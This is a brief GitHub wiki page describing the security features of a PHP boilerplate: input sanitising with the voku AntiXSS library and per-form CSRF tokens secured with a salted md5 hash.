-
Notifications
You must be signed in to change notification settings - Fork 1
Security
schnoog edited this page Dec 29, 2017
·
1 revision
This boilerplate includes the voku "AntiXSS - Library"
The class instance is generated during bootstrapping of the app (including the AJAX backend)
Every string can be secured by this library by using
$savestring=$antiXss->xss_clean($harmful);
To avoid CSRF, a "token" field is attached to each form automatically.
This token contains the user group mask which allowed fine granulation in the backend and also the userid.
Manipulation of them is protected by a good salten md5 hash.
In addition, this token is added to each page specific javascript file for easy use in ajax requests.